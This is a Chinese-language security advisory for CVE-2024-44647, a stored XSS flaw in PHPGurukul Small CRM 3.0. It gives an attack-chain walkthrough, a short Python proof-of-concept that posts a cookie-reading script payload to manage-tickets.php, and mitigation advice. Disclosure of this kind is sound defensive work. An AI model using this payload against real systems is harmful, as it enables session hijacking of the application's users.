CVE-2024-44647 CVSS 6.1 中危

CVE-2024-44647: PHPGurukul Small CRM 3.0 XSS漏洞

披露日期: 2025-11-17

来源: [email protected]

漏洞信息

漏洞编号

CVE-2024-44647

漏洞类型

XSS跨站脚本攻击

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

PHPGurukul Small CRM 3.0

漏洞概述

CVE-2024-44647是PHPGurukul Small CRM 3.0中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于manage-tickets.php页面的aremark参数中，攻击者可以通过该参数注入恶意JavaScript代码。由于漏洞位于工单管理功能，攻击者可以利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或修改页面内容。攻击成功需要诱导受害者访问包含恶意脚本的页面或触发相关功能。由于该参数可能将用户输入存储到数据库中，其他用户在查看工单详情时会自动执行攻击者植入的恶意代码，造成持久性攻击效果。

技术细节

该漏洞是典型的存储型XSS(Stored XSS)漏洞。攻击者通过在manage-tickets.php页面的aremark参数中注入恶意JavaScript代码，当该数据被存储到数据库后，所有查看该工单的用户都会触发恶意代码执行。漏洞产生的根本原因是应用程序未对用户输入进行充分的输入验证和输出编码。攻击者可以利用此漏洞执行以下操作：1) 窃取用户会话cookie进行账户劫持；2) 注入恶意重定向代码进行钓鱼攻击；3) 修改页面DOM结构进行欺诈活动；4) 收集用户敏感信息。攻击者需要构造包含<script>alert(document.cookie)</script>等payload的请求，并确保payload被存储到服务器数据库中。

攻击链分析

STEP 1

步骤1

攻击者访问PHPGurukul Small CRM 3.0的manage-tickets.php页面

STEP 2

步骤2

攻击者在aremark参数中注入恶意XSS payload，如<script>alert(document.cookie)</script>

STEP 3

步骤3

攻击者提交包含恶意代码的表单请求，数据被存储到数据库

STEP 4

步骤4

受害者登录系统并访问包含恶意代码的工单页面

STEP 5

步骤5

受害者浏览器执行攻击者植入的恶意JavaScript代码

STEP 6

步骤6

攻击者通过恶意脚本窃取受害者会话cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2024-44647 XSS PoC for PHPGurukul Small CRM 3.0
# Target: manage-tickets.php aremark parameter

target_url = "http://target-website.com/small-crm/manage-tickets.php"

# Malicious XSS payload
xss_payload = "<script>alert(document.cookie)</script>"

# PoC HTTP POST request
data = {
    'aremark': xss_payload,
    # Add other required form parameters
    'submit': 'submit'
}

print(f"[*] Sending XSS payload to: {target_url}")
print(f"[*] Payload: {xss_payload}")

try:
    response = requests.post(target_url, data=data, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully")
        print("[*] Payload should be stored and executed when viewed")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

PHPGurukul Small CRM 3.0

防御指南

临时缓解措施

在用户输入处理和输出显示时进行严格的输入验证和输出编码。对所有用户可控的输入参数使用htmlspecialchars()或htmlentities()等函数进行HTML实体编码，转义特殊字符如<、>、"、'、&等。同时配置Content-Security-Policy响应头禁止内联脚本执行，并对Cookie设置HttpOnly属性防止XSS攻击窃取会话。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2024-44647
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2024-44647
3 Details https://www.cvedetails.com/cve/CVE-2024-44647/
4 VulDB https://vuldb.com/cve/CVE-2024-44647
5 Link https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44647.md
6 Link https://phpgurukul.com/small-crm-php/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表